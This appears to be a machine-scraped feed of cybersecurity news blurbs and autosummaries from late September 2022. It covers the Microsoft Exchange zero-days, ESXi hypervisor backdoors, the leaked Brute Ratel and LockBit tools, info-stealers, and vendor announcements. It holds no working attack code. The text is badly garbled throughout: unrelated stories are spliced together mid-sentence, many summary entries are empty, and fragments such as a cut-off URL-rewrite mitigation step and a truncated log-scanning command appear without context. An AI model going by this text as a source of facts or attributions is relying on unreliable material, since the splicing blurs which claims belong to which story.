Among other changes in organizations’ approach to cybersecurity: 43% of companies have placed a higher priority on incident response 39% are deploying a more diverse set of technology tools, with SaaS monitoring and management tools making a substantial jump in adoption 38% are increasing their focus on process improvements 37% are shifting to more proactive measures 36% are expanding employee education. "Trellix released global research revealing the cost of siloed security, weak spots in protection, and lack of confidence amongst security operations teams. The study of 9,000 global cybersecurity professionals also looks to the future of security and the technology poised to revolutionize security operations. 89% of respondents describe their current security model as “siloed.” Consequentially, 73% are likely allocating budget to advanced solutions, including XDR, to enable an integrated security approach. “This research reveals how … More
The post Are you inundated by a never-ending stream of cyberattacks? appeared first on Help Net Security.
"Autosummary:
Additional technologies very likely to be implemented are Network Detection and Response (NDR) (39%), Endpoint Detection and Response (EDR) (38%) and breach attack simulations (37%). "Autosummary:
*" to the URL Path, and Condition input: Choose {REQUEST_URI} "I can confirm significant numbers of Exchange servers have been backdoored - including a honeypot," Security researcher Kevin Beaumont said in a series of tweets, adding, "it looks like a variant of proxying to the admin interface again. "Researchers from Mandiant have discovered a novel malware persistence technique within VMware ESXi Hypervisors. Mandiant detailed a novel technique used by malware authors to achieve administrative access within VMware ESXi Hypervisors and take over vCenter servers and virtual machines for Windows and Linux to perform the following actions: Send commands to the hypervisor that will […]
The post Experts uncovered novel Malware persistence within VMware ESXi Hypervisors appeared first on Security Affairs.
"Autosummary:
A signature file – A digital signature used to verify the host acceptance level of a VIB The XML Descriptor File is a config which contains references to the following: The payload to be installed VIB metadata, such as the name and install date The signature file that belongs to the VIB Mandiant researchers discovered that attackers were able to modify the acceptance level in the XML descriptor of the VBI from ‘community’ to ‘partner’ to make it appear to have been created by a trusted entity. "Autosummary:
"The first vulnerability, identified as CVE-2022-41040, is a Server-Side Request Forgery (SSRF) vulnerability, while the second, identified as CVE-2022-41082, allows remote code execution (RCE) when PowerShell is accessible to the attacker," Microsoft said. "Attackers are leveraging two zero-day vulnerabilities (CVE-2022-41040, CVE-2022-41082) to breach Microsoft Exchange servers. News of the attacks broke on Wednesday, when researchers with Vietnamese cybersecurity company GTSC released a warning saying that, “while providing SOC service to a customer, GTSC Blueteam detected exploit requests in IIS logs with the same format as ProxyShell vulnerability.” About the vulnerabilities (CVE-2022-41040, CVE-2022-41082) CVE-2022-41040 is a Server-Side Request Forgery (SSRF) vulnerability and CVE-2022-41082 allows remote code execution when PowerShell … More
The post Two Microsoft Exchange zero-days exploited by attackers (CVE-2022-41040, CVE-2022-41082) appeared first on Help Net Security.
"Autosummary:
About the vulnerabilities (CVE-2022-41040, CVE-2022-41082) CVE-2022-41040 is a Server-Side Request Forgery (SSRF) vulnerability and CVE-2022-41082 allows remote code execution when PowerShell is accessible to the attacker, Microsoft explained. "Autosummary:
"Microsoft confirmed that two recently disclosed zero-day flaws in Microsoft Exchange are being actively exploited in the wild. Microsoft confirmed that two zero-day vulnerabilities in Microsoft Exchange recently disclosed by researchers at cybersecurity firm GTSC are being actively exploited in the wild. The IT giant has promptly started the investigation into the two zero-day vulnerabilities […]
The post Microsoft confirms Exchange zero-day flaws actively exploited in the wild appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On To allow organizations to check if their Exchange Servers have been compromised by exploiting these flaws, GTSC released guideline and a tool to scan IIS log files (stored by default in the %SystemDrive%\inetpub\logs\LogFiles folder ): Method 1 : Use powershell command: : Use powershell command: Get-ChildItem -Recurse "Security researchers are warning of a new Microsoft Exchange zero-day that are being exploited by malicious actors in the wild. Cybersecurity firm GTSC discovered two Microsoft Exchange zero-day vulnerabilities that are under active exploitation in attacks in the wild. Both flaws were discovered by the researchers as part of an incident response activity in August […]
The post Unpatched Microsoft Exchange Zero-Day actively exploited in the wild appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
One of the three individuals, a 24-year-old German citizen, has been arrested and charged, while a second one, a 40-year-old, was also charged with 124 acts of computer fraud. "Unknown attackers wielding novel specialized malware have managed to compromise VMware ESXi hypervisors and guest Linux and Windows virtual machines, Mandiant threat analysts have discovered. They named the malware VirtualPITA (ESXi & Linux), VirtualPIE (ESXi), and VirtualGATE (Windows), and shared detection and hardening advice. The malware and techniques used by the attackers VirtualPITA and VirtualPIE are backdoors, which the attackers deliver by using malicious vSphere Installation Bundles (VIBs). VirtualGATE is a utility program that incorporates … More
The post Attackers use novel technique, malware to compromise hypervisors and virtual machines appeared first on Help Net Security.
"Autosummary:
VMware recommendations “Mandiant has brought to our attention a new variant of malware targeting vSphere, which was discovered in an environment where threat actors may have used operational security weaknesses to compromise a mutual customer,” VMware shared on Thursday, in response to Mandiant’s report. "Autosummary:
"Autosummary:
"Autosummary:
We at @SolveCyberRisk @binaryedgeio have been observing active scanning and exploitation of the just announced CVE-2022-36804 - This CVE affects Atlassian Bitbucket, go patch: https://t.co/YYG1qY9uUg pic.twitter.com/Jy12W9ZB3E — Tiago Henriques (@Balgan) September 23, 2022 Federal agencies ordered to mitigate All Federal Civilian Executive Branch Agencies (FCEB) agencies apply patches or mitigation measures for these three actively exploited bugs after being added to CISA"s KEV catalog as required by a binding operational directive (BOD 22-01) from November. "Autosummary:
Bitbucket repository used by the threat actor (Cisco) Deploying via PowerShell The first attack method executes a series of Virtual Basic scripts in the downloaded DOTM template, starting from decoding a data blob, writing it into an HTA file, and loading the next script using ShellExecuted. "Autosummary:
The harassment campaign launched by the group of eBay employees included: sending anonymous, threatening messages delivering a funeral wreath, a mask of a bloody pig"s face, live insects, and a book on surviving the loss of a spouse sending pornography addressed to the Steiners, but delivered to their neighbours posting adverts for sex parties at the couple"s home on Craigslist traveling across the country to spy on the Steiners, and attempting to plant a GPS tracker on their car Fearing for their lives, the Steiners installed surveillance cameras to monitor anyone approaching their home. "Autosummary:
"The US Department of Defense (DoD) shared the results of the Hack US bug bounty program that took place in July. On July 4, 2022, the US Department of Defense (DoD) and HackerOne started the Hack US, a one-week bug bounty challenge, which is considered part of DoD’s vulnerability disclosure program (VDP). The challenge was launched Chief […]
The post US DoD announced the results of the Hack US bug bounty challenge appeared first on Security Affairs.
"Autosummary:
"Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @Seifreed, @serghei, @VK_Intel, @billtoulas, @DanielGallagher, @jorntvdw, @PolarToffee, @BleepinComputer, @fwosar, @struppigel, @demonslay335, @LawrenceAbrams, @Ionut_Ilascu, @FourOctets, @malwrhunterteam, @malwareforme, @swascan, @y_advintel, @AdvIntel, @angel11VR, @InsideStairwell, @aejleslie, @Cyderes, @ahnlab, and @pcrisk. "Categories: Exploits and vulnerabilities Categories: News Tags: Exchange Tags: ProxyShell Tags: remote PowerShell Tags: web shell Tags: CVE-2022-41040 Tags: CVE-2022-41082 Tags: SSRF Tags: RCE Two ProxyShell-like vulnerabilities are being used to exploit Microsoft Exchange Servers |
The post Two new Exchange Server zero-days in the wild appeared first on Malwarebytes Labs.
"Autosummary:
Posted: September 30, 2022 by Two ProxyShell-like vulnerabilities are being used to exploit Microsoft Exchange Servers Microsoft has issued some customer guidance as it investigates (yes, more) reported vulnerabilities in Microsoft Exchange Server, affecting the 2013, 2016, and 2019 versions of the software. The vulnerabilities, which are chained together, are: CVE-2022-41040, a Server-Side Request Forgery (SSRF) vulnerability. "Aunalytics initiated its Security Patching Platform, Co-managed Patching as a Service to complement the company’s Advanced Security solution suite. Windows OS and supported 3rd party patch management allow for tighter security in the defense against cyberattacks and the new offering ensures active remediation. According to a 2022 Data Breach Investigations Report by Verizon, around 70 percent of successful cyberattacks exploited known vulnerabilities with available patches, making it important to update operating systems and applications regularly … More
The post Aunalytics Security Patching Platform protects users against system compromise appeared first on Help Net Security.
"Autosummary:
The platform facilitates collaboration between IT and security teams and includes the following capabilities: Inventory and performance management and proactive alerting Patch deployment control strategy, prioritization, planning Patch vetting and blacklisting intelligence Windows Operating System patch management Supported 3rd Party Patch Management Anti-Malware DNS-based Malware Protection Device Encryption Management Innovative management tool library “Security patch exploits can have extremely damaging effects on an organization, decreasing revenues or causing reputational damage, making it imperative to have security patching in place,” said Chris Nicholson, Vice President of Managed IT Services. "Malwarebytes has expanded its OneView platform capabilities as well as grow the company’s Managed Service Provider (MSP) program. In addition to endpoint security, MSPs can now access vulnerability assessment, patch management and Domain Name System (DNS) filtering from Malwarebytes OneView. “At Malwarebytes, we aim to serve the underserved, which is what our MSP partners are doing every day for SMBs,” said Brian Thomas, Vice President of Worldwide MSP & Channel Programs at Malwarebytes. “I joined … More
The post Malwarebytes enhances OneView platform to improve protection for SMB customers appeared first on Help Net Security.
"Autosummary:
Malwarebytes’ initial MSP Program and OneView showed significant traction, resulting in over 250% YOY growth, with more than 2,700 new global MSP partners and strategic partnerships with Addigy, Atera, ConnectWise, Datto, GCN Group, Kaseya, Sherweb, TeamViewer and regional partner Soft Solutions. "IoT embedded systems combine hardware, firmware, and internet connectivity to carry out particular functions. These devices transfer real-time data via the internet for various purposes, including tracking, monitoring, and analysis. In this Help Net Security video, Hubertus Grobbel, VP of Security Solutions at Swissbit, discusses the insecurity of IoT devices and offers tips on how to secure them.
The post Embedded IoT security threats and challenges appeared first on Help Net Security.
"Autosummary:
"The latest Internet Security Report from the WatchGuard Threat Lab shows a reduction in overall malware detections from the peaks seen in the first half of 2021, along with an increase in threats for Chrome and Microsoft Office and the ongoing Emotet botnet resurgence. Office exploits on the rise “While overall malware attacks in Q2 fell off from the all-time highs seen in previous quarters, over 81% of detections came via TLS encrypted connections, continuing … More
The post Office exploits continue to spread more than any other category of malware appeared first on Help Net Security.
"Autosummary:
Office exploits on the rise “While overall malware attacks in Q2 fell off from the all-time highs seen in previous quarters, over 81% of detections came via TLS encrypted connections, continuing a worrisome upward trend,” said Corey Nachreiner, CSO at WatchGuard. "U.S. businesses are at high risk for data security threats from increasingly effective phishing attempts and the lack of procedures to restrict data access, according to GetApp’s 4th Annual Data Security Report. Newer companies are especially vulnerable to security threats. This survey of IT security managers and employees reveals seven significant trends related to data security threats facing U.S. businesses: 1. Phishing emails are on the rise, and so are the employees clicking the links … More
The post Data security trends: 7 statistics you need to know appeared first on Help Net Security.
"Autosummary:
Phishing emails are on the rise, and so are the employees clicking the links This year, 89% of companies surveyed report receiving a phishing email, a jump from 77% who said the same in 2021. "The APWG’s Phishing Activity Trends Report reveals that in the second quarter of 2022, the APWG observed 1,097,811 total phishing attacks — the worst quarter for phishing that APWG has ever observed. This Help Net Security video uncovers how the number of phishing attacks reported has quadrupled since early 2020.
The post Phishing activity exploded in Q2 2022 appeared first on Help Net Security.
"Autosummary:
"The Brute Ratel post-exploitation toolkit has been cracked and now is available in the underground hacking and cybercrime communities. Threat actors have cracked the Brute Ratel C4 (BRC4) post-exploitation toolkit and leaked it for free in the cybercrime underground. The availability of the cracked version of the tool was first reported by the cybersecurity researcher Will […]
The post A cracked copy of Brute Ratel post-exploitation tool leaked on hacking forums appeared first on Security Affairs.
"Autosummary:
The availability of the cracked version of the tool was first reported by the cybersecurity researcher Will Thomas (@BushidoToken), ICYMI, threat actors on multiple underground forums are sharing around a copy of a cracked version of Brute Ratel (aka BRC4), brace for attacks "bruteratel_1.2.2.Scandinavian_Defense.tar.gz"https://t.co/jfWXV8sJbR h/t @darkcoders_mrx for the pic pic.twitter.com/OhfRMZBzVl — Will (@BushidoToken) September 28, 2022 Unlike Cobalt strike beacons, BRc4 payloads are less popular, but with similar capabilities. Two weeks later, on 28 September, the author of BRC4, Chetan Nayak, confirmed the leak of the tool by MdSec, he blamed a Russian-speaking group known as Molecules for the leak of the cracked copy. "A new multifunctional Go-based malware dubbed Chaos is targeting both Windows and Linux systems, experts warn. Researchers from Black Lotus Labs at Lumen Technologies, recently uncovered a multifunctional Go-based malware that was developed to target devices based on multiple architectures, including Windows and Linux. The malicious code was developed to target a broad range of devices, […]
The post Go-based Chaos malware is rapidly growing targeting Windows, Linux and more appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
The VIB package includes the following: an archive, typically referred to as "payload" files that need to be installed on the host an XML descriptor with information about the VIB requirements, dependencies, compatibility issues, payload to install, name, install date signature file that verifies the maker of the VIB and the level of trust associated with it VIBs can be created by VMware (created and tested by the company), approved partners, or the community (not a source accepted through the VMware program, such as individuals or third-party partners). "Autosummary:
The backdoor supports various capabilities, such as file actions, command execution, process termination, registry modification, and screen capturing. "Autosummary:
"Autosummary:
"Autosummary:
Example of a Royal callback phishing email Source: AdvIntel When a victim calls the number, the threat actors use social engineering to convince the victim to install remote access software, which is used to gain initial access to the corporate network. However, it is strongly advised that network, windows, and security admins keep an eye out for this group, as they are quickly ramping up operations and will likely become one of the more significant enterprise-targeting ransomware operations. "Autosummary:
For instance: Attacks on webbased apps and services (like Microsoft 365) could lead to data loss Phishing emails can impact anyone, anytime, causing you to download a malicious attachment or inadvertently reveal sensitive information — no matter whether you’re on a Windows computer, a Mac or even your smartphone.They are the ones you spend hours reminding everyone else to follow: Avoiding clicking on email attachments or links from unknown senders Installing the latest software updates as soon as they’re available Never bypassing security settings to install apps if you’re not 100% certain of their safety Still, even the tech-savviest among us can make mistakes or otherwise fall victim to ransomware and other cyberthreats. Even offline events, like hardware damage or having your laptop stolen, can cause you to lose valuable files, photos and other data if they’re not safely backed up. "Autosummary:
Prilex is "dealing directly with the PIN pad hardware protocol instead of using higher level APIs, doing real-time patching in target software, hooking operating system libraries, messing with replies, communications and ports, and switching from a replay-based attack to generate cryptograms for its GHOST transactions even from credit cards protected with CHIP and PIN technology," the researchers said. "Autosummary:
Temporary mitigation available Until Microsoft releases security updates to address the two zero-days, GTSC shared temporary mitigation that would block attack attempts by adding a new IIS server rule using the URL Rewrite Rule module: In Autodiscover at FrontEnd, select tab URL Rewrite, and then Request Blocking. "Autosummary:
Next, the threat actors fetch the backdoor hiding in the image file, which enables them to do the following: Perform file and directory actions Start, enumerate, or kill processes Modify the Windows Registry Download additional payloads Exfiltrate files Witchetty also introduced a custom proxy utility that causes the infected computer to act "as the server and connects to a C&C server acting as a client, instead of the other way around. "Autosummary:
Temporary mitigation available Until Microsoft releases security updates to address the two zero-days, GTSC shared temporary mitigation that would block attack attempts by adding a new IIS server rule using the URL Rewrite Rule module: In Autodiscover at FrontEnd, select tab URL Rewrite, and then Request Blocking. "Categories: Business With a few best practices, local governments can improve their cybersecurity posture and make it less likely that threat actors attack their systems. We’ll break down five best practices for local government cybersecurity in this post. |
The post Local government cybersecurity: 5 best practices appeared first on Malwarebytes Labs.
"Autosummary:
In particular, local governments looking to be eligible for the State and Local Cybersecurity Grant Program must include these best practices in their cybersecurity plan: In addition, only 23% of local governments have adopted the .gov domain, meaning a majority of local governments are missing out on one of the simplest ways to strengthen their cybersecurity posture. Know who you’re going to contact: Maintain an up-to-date list of internal and external stakeholders to contact in the event of an attack, which may include senior management, PR, your legal team, insurance providers, vendors, and law enforcement.NIST recommends that organizations follow these steps to accelerate their recovery, among others: Develop an incident recovery plan: Establish a plan that has a Cyber Incident Response Team (CIRT) with clearly identified roles, responsibilities, and contacts ahead of time, then regularly exercise that plan.Some of functions commonly outsourced are: “By working with a trusted partner or service provider, local governments can fast track to get their security stack up to par,” said David Pier, Team Lead, Corporate Solutions Engineering at Malwarebytes. "Categories: News Tags: Optus Tags: breach Tags: optusdata Tags: text messages Tags: drivers" licenses Tags: Medicare Tags: identity protection A hacker stole the personal information of 10 million Optus customers, threatened to publish them in lots of 10,000 a day unless the ransom was paid, and then suddenly did a 180 degree turn. |
The post Optus data breach "attacker" says sorry, it was a mistake appeared first on Malwarebytes Labs.
"Autosummary:
Posted: September 29, 2022 by A hacker stole the personal information of 10 million Optus customers, threatened to publish them in lots of 10,000 a day unless the ransom was paid, and then suddenly did a 180 degree turn. In a definitely related activity, but probably not by the same threat actor, victims of the data breach have also started to receive text messages saying they must pay AUD 2,000 ($1,300) within two days or their data will be sold on for “fraudulent activity”. Extortion On an online forum, optusdata threatened to publish the data of 10,000 Optus customers per day unless they received $1 million in cryptocurrency. "Autosummary:
Temporary mitigation available Until Microsoft releases security updates to address the two zero-days, GTSC shared temporary mitigation that would block attack attempts by adding a new IIS server rule using the URL Rewrite Rule module: In Autodiscover at FrontEnd, select tab URL Rewrite, and then Request Blocking. "Cyber threats worldwide continue to escalate and drive continued innovation and investment in cybersecurity. Cyber budgets remain high, and how the cyber market continues to outpace other IT sectors. In this Help Net Security video, Nick Kingsbury, Partner at Amadeus Capital Partners, offers a unique perspective on investing in cybersecurity. Amadeus Capital Partners is a global technology investor. Since 1997, the firm has backed over 180 companies and raised over $1 billion for investment.
The post A personal perspective on investing in cybersecurity appeared first on Help Net Security.
"Autosummary:
"To help limit the more than $100 billion of global sales revenue lost to false positives during the fraud detection process, TransUnion launched TruValidate Device Risk with Behavioral Analytics. The solution is newly fortified by NeuroID’s behavioral analytics and aims to help businesses stop fraud – not good customers – based on device recognition, context, device and user behavior. The solution builds trusted connections by allowing users to join a global network of 6,000 fraud … More
The post TransUnion TruValidate Device Risk with Behavioral Analytics improves fraud detection for businesses appeared first on Help Net Security.
"Autosummary:
By analyzing this data in real-time, these products can help provide critical information as to whether a loan applicant’s intentions are genuine, or deceptive, without adding any additional friction to the process,” said Jason Laky, executive vice president and head of financial services at TransUnion. "Autosummary:
"Autosummary:
LockBit 3.0 ransomware builder configuration file Source: BleepingComputer Unfortunately, our predictions have come true, and a relatively new ransomware group named "Bl00Dy Ransomware Gang" has already utilized the builder in an attack on a Ukrainian entity. "Chaos, new multipurpose malware written in the Go programming language, is spreading across the world. “We are seeing a complex malware that has quadrupled in size in just two months, and it is well-positioned to continue accelerating,” said Mark Dehus, director of threat intelligence at Lumen‘s Black Lotus Labs. Versatile and potent Chaos is designed to work across several architectures, including ARM, Intel (i386), MIPS and PowerPC. It was developed for Windows, Linux, and a … More
The post Multi-platform Chaos malware threatens to live up to its name appeared first on Help Net Security.
"Autosummary:
"Autosummary:
What"s more, the malware has versatility that similar malware does not, enabling it to operate across a wide range of instruction set architectures from ARM, Intel (i386), MIPS, and PowerPC, effectively allowing the threat actor to broaden the scope of its targets and swiftly accrue in volume. "Autosummary:
"Autosummary:
"The Russia-linked APT28 group is using mouse movement in decoy Microsoft PowerPoint documents to distribute malware. The Russia-linked APT28 employed a technique relying on mouse movement in decoy Microsoft PowerPoint documents to deploy malware, researchers from Cluster25 reported. Cluster25 researchers were analyzing a lure PowerPoint document used to deliver a variant of Graphite malware, which is known to be used […]
The post APT28 relies on PowerPoint Mouseover to deliver Graphite malware appeared first on Security Affairs.
"Autosummary:
Finally, based on several indicators, geopolitical objectives and the analyzed artifacts, Cluster25 attributes this campaign to the Russia-linked threat actor known as APT28 (aka Fancy Bear, TSAR Team, Pawn Storm, Sednit) and indicates entities and individuals operating in the defense and government sectors of Europe and Eastern Europe countries as potential targets.” concludes the report. "The recently born Bl00Dy Ransomware gang has started using the recently leaked LockBit ransomware builder in attacks in the wild. The Bl00Dy Ransomware gang is the first group that started using the recently leaked LockBit ransomware builder in attacks in the wild. Last week, an alleged disgruntled developer leaked the builder for the latest encryptor […]
The post Bl00dy ransomware gang started using leaked LockBit 3.0 builder in attacks appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
This Go-based malware can also infect various architectures, including x86, x86-64, AMD64, MIPS, MIPS64, ARMv5-ARMv8, AArch64, and PowerPC, used by a wide range of devices from small office/home office routers and enterprise servers. "The recently discovered malware builder Quantum Builder is being used by threat actors to deliver the Agent Tesla RAT. A recently discovered malware builder called Quantum Builder is being used to deliver the Agent Tesla remote access trojan (RAT), Zscaler ThreatLabz researchers warn. “Quantum Builder (aka “Quantum Lnk Builder”) is used to create malicious shortcut […]
The post Threat actors use Quantum Builder to deliver Agent Tesla malware appeared first on Security Affairs.
"Autosummary:
Below are the Key Features of this attack: The threat actors are evolving their tactics by incorporating new infection chains for delivering Agent Tesla on target machines by leveraging the LNK and HTA payloads generated by a builder dubbed “Quantum Builder” The Quantum Builder is a builder sold in the cybercrime marketplace and is capable of generating LNK, HTA, and ISO payloads consisting of sophisticated techniques to download and execute the final payload with a Multi-Staged attack Chain. Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Scam SMS/text messages can also be copied and forwarded to wireless providers via text to 7726 (SPAM), which helps them spot and block similar messages in the future," the IRS added. "GuidePoint Security has released its ICS Security Services that include a Security Program Review, Security Architecture Review and ICS Penetration Testing that collectively are designed to provide an organization with a holistic view of their entire ICS security posture. Traditionally, Operational Technology (OT) environments were kept separate and isolated from the traditional IT infrastructure. Today, ICS environments have emerged from the combination of IT and OT (Industry 4.0), introducing new features and easier management, but … More
The post GuidePoint Security releases ICS Security Services to address OT security challenges appeared first on Help Net Security.
"Autosummary:
GuidePoint’s ICS Security Service offerings include: Security Program Review (SPR): The SPR evaluates and measures an organization’s security program maturity and is based on the framework chosen by the customer, including, but not limited to: NIST Cybersecurity Framework (CSF), NIST 800 82, CIS Controls, ISO/IEC 62443, ISO 27001, C2M2, FERC/NERC-CIP, CISA TSS and ITU CIIP. "Autosummary:
"There are now multiple posts on multiple of the most populated cybercrime forums where data brokers, malware developers, initial access brokers, and ransomware affiliates all hang out," warns Thomas in a new report on the cracked version of Brute Ratel. "Categories: News Tags: APT28 Tags: Fancy Bear Tags: PowerPoint Tags: PowerShell Tags: One Drive Tags: SyncAppvPublishingServer The Russian APT known as Fancy Bear was caught using an old mouseover technique that doesn"t need macros |
The post APT28 attack uses old PowerPoint trick to download malware appeared first on Malwarebytes Labs.
"Autosummary:
Posted: September 28, 2022 by The Russian APT known as Fancy Bear was caught using an old mouseover technique that doesn"t need macros Researchers at Cluster25 have published research about exploit code that"s triggered when a user moves their mouse over a link in a booby-trapped PowerPoint presentation. "Categories: News Tags: School Tags: password Tags: sticky note Tags: lax security Tags: Sometimes we hear stories about brilliant students that hack their school and get celebrated, but it doesn"t always end well. |
The post 4 times students compromised school cybersecurity appeared first on Malwarebytes Labs.
"Autosummary:
3. 12-year-olds pwn their school district The hack started small, in seventh grade, when the students bypassed their middle school’s internet filters to watch YouTube during lunch.Guilty until proven innocent A Canadian student at Tufts University veterinarian school was expelled for an elaborate months-long scheme involving stealing and using university logins to break into the student records system, view answers, and alter her own and other students’ grades. "Elevate Security and Booz Allen Hamilton announced a strategic partnership that aligns Booz Allen’s cybersecurity consulting services with Elevate’s human cyber risk quantification and mitigation software to address the human element of cybersecurity risk. Booz Allen’s Commercial team will leverage Elevate’s vast cyber risk intelligence capabilities to deliver rapid risk assessments and provide deep visibility to organization-wide internal cyber risk. Additionally, Elevate will power the Booz Allen Commercial team’s Dynamic Cyber Trust solution, which adapts … More
The post Elevate Security partners with Booz Allen Hamilton to combat advanced cybersecurity attack appeared first on Help Net Security.
"Autosummary:
“Our Dynamic Cyber Trust solution leverages the Elevate Security platform to create a uniquely scalable approach that holistically targets one of cybersecurity’s root causes of failure – people,” said Andrew Turner, executive vice president, chief technology officer, and market strategy lead for Booz Allen’s global Commercial business. "Cybrary announced a partnership with Carahsoft Technology Corp to provide cybersecurity skill development to government agencies and customers. Under the agreement, Carahsoft will serve as Cybrary’s Public Sector distributor, making the company’s cybersecurity training and skills development platform available to the Public Sector through Carahsoft’s reseller partners, NASA Solutions for Enterprise-Wide Procurement (SEWP) V, Information Technology Enterprise Solutions – Software 2 (ITES-SW2), OMNIA Partners, National Association of State Procurement Officials (NASPO), ValuePoint, and National Cooperative … More
The post Cybrary and Carahsoft join forces to provide cybersecurity training for government customers appeared first on Help Net Security.
"Autosummary:
"Despite increased investment in tools to fight ransomware, 90% of organizations were affected by ransomware in some capacity over the past 12 months, according to SpyCloud’s 2022 Ransomware Defense Report. Allocation of security budgets Respondents ranked the risk of attack through third-party vendors as the main factor driving the allocation of security budgets, followed by the rise in frequency and sophistication of ransomware attacks. As a result, organizations’ ransomware mitigation solutions focus increasingly on the … More
The post The various ways ransomware impacts your organization appeared first on Help Net Security.
"Autosummary:
We have heard warnings recently against using SMS authentication for MFA since texts can be intercepted by motivated cybercriminals, but even push notifications and authentication applications are not completely foolproof or secure, which these malware and compromised cookies trends are showing,” Darren Siegel, Cyber Security Expert at Specops Software, told Help Net Security. Cybercriminals deploy malware to steal data including credentials to workforce applications, browser fingerprints, and device or web session cookies, enabling them to impersonate an employee and access and encrypt data while bypassing MFA and other security controls. "In this Help Net Security video, Chip Gibbons, CISO at Thrive, illustrates the differences between a business continuity plan and a disaster recovery plan. While these terms are often used interchangeably, there are important differences and it’s critical to have both plans in place to help mitigate the impact on business operations: A business continuity plan refers to how a business continues to operate when key systems are down or an outage occurs. A business … More
The post The key differences between a business continuity plan and a disaster recovery plan appeared first on Help Net Security.
"Autosummary:
"For cybersecurity professionals, it is a huge challenge to separate the “good guys” from the “villains”. In the past, most cyberattacks could simply be traced to external cybercriminals, cyberterrorists, or rogue nation-states. But not anymore. Threats from within organizations – also known as “insider threats” – are increasing and cybersecurity practitioners are feeling the pain. Traditional perimeter defenses are not designed to prevent these attacks. They also struggle to keep external attackers out. Clever hackers … More
The post Why zero trust should be the foundation of your cybersecurity ecosystem appeared first on Help Net Security.
"Autosummary:
The guide explains how your organization can design a zero trust implementation strategy, select an appropriate methodology, assemble the right tools, and execute the implementation plan for successful zero trust adoption. The growth of zero trust Recently, zero trust has developed a large following due to a surge in insider attacks and an increase in remote work – both of which challenge the effectiveness of traditional perimeter-based security approaches. New eBook helps you implement zero trust The Cynet zero trust eBook walks through the core concepts and principles of zero trust. "Cybercriminals wielding the FARGO (aka Mallox, aka TargetCompany) ransomware are targeting Microsoft SQL (MS SQL) servers, AhnLab’s ASEC analysis team has warned. They haven’t pinpointed how the attackers are getting access to the targeted servers, but noted that typical attacks targeting database servers include brute force and dictionary attacks aimed at ferreting out the passwords of existing, poorly secured accounts. “And there may be vulnerability attacks on systems that do not have a vulnerability patch … More
The post MS SQL servers are getting hacked to deliver ransomware to orgs appeared first on Help Net Security.
"Autosummary:
"The recently discovered Erbium information-stealer is being distributed as fake cracks and cheats for popular video games. Threat actors behind the new ‘Erbium’ information-stealing malware are distributing it as fake cracks and cheats for popular video games to steal victims’ credentials and cryptocurrency wallets. The Erbium info-stealing malware was first spotted by researchers at threat […]
The post Erbium info-stealing malware, a new option in the threat landscape appeared first on Security Affairs.
"Autosummary:
System information (CPU, GPU, DISK, RAM, number of monitors, monitor resolutions, monitor resolutions, MAC, Windows version, Windows owner, PC name, PC architecture, Windows license key) Passwords, cookies, history, maps, autofill from most popular browsers based on Gecko and Chromium Cold wallets from browsers (MetaMask, TronLink, Binance Chain Wallet, Yoroi, Nifty Wallet, Math Wallet, Coinbase Wallet, Guarda, EQUAL Wallet, Jaxx Liberty, BitApp Wallet, iWallet, Wombat, MEW CX, GuildWallet, Saturn Wallet, Ronin Wallet, NeoLine, Clover Wallet, Liquality Wallet, Terra Station, Keplr, Sollet, Auro Wallet, Polymesh Wallet, ICONex, Nabox Wallet, KHC, Temple, TezBox, Cyano Wallet, Byone, OneKey, LeafWallet, DAppPlay, BitClip, Steem Keychain, Nash Extension , Hycon Lite Client, ZilPay, Coin98 Wallet, Harmony, KardiaChain, Rabby, Phantom, TON Crystal Wallet) Other browser plugins (Authenticator, Authy, Trezor Password Manager, GAuth Authenticator, EOS Authenticator) Steam (list of accounts and authorization files) Cold desktop wallets (Exodus, Atomic, Armory, Bitecoin-Core, Bytecoin, Dash-Core, Electrum, Electron, Coinomi, Ethereum, Litecoin-Core, Monero-Core, Zcash, Jaxx) “Erbium is an info-stealer capable of strongly impacting the confidentiality and integrity of the data and information contained in the systems it affects and is an example of how the panorama of malicious tools is constantly evolving, offering proposals that are increasingly within reach of all, in consideration of the low selling prices.” says Emanuele De Lucia, Director of Cyber Intelligence presso Cluster25. "Group-IB has noted a fivefold increase in the number of domains used for crypto giveaway scams that involve fake YouTube streams in the first half of 2022. This Help Net Security video reveals how crypto giveaway scams have evolved into a profitable illicit market segment.
The post Scams targeting crypto enthusiasts are becoming increasingly common appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Kaspersky said it blocked attempts to infect more than 47,778 victims worldwide, with a majority of the users located in Brazil, India, Russia, Italy, Germany, France, Egypt, Turkey, and the U.S. "Autosummary:
The impact of bug bounty program on cybersecurity By launching a bug bounty program, organizations experience: More robust protection: Company data, brand, and reputation have additional protection through continuous security testing. How bug bounty programs support continuous security testing structures While you"ll receive a certificate to say you"re secure at the end of a penetration test, it won"t necessarily mean that"s still the case the next time you make an update. 5 — Poor-fitting security testing solutions for agile environments Continuous development lifecycles don"t align with penetration testing cycles (often performed annually.) "Autosummary:
"Elbit Systems of America, a subsidiary of defense giant Elbit Systems, disclosed a data breach after Black Basta ransomware gang claimed to have hacked it. In late June, the Black Basta ransomware gang claimed to have hacked Elbit Systems of America, the extortion group added the name of the company to its Tor leak site. […]
The post Defense firm Elbit Systems of America discloses data breach appeared first on Security Affairs.
"Autosummary:
Some of the documents published by the Black Basta gang on its leak site as proof of the hack included, an audit report, confidentiality agreements, and a payroll report Black Basta has been active since April 2022, like other ransomware operations, it implements a double-extortion attack model. "Autosummary:
Kaspersky, whose analysts discovered the new dropper, reports that NullMixer has already attempted infections on 47,778 of its customers across the United States, Germany, France, Italy, India, Russia, Brazil, Turkey, and Egypt. "Autosummary:
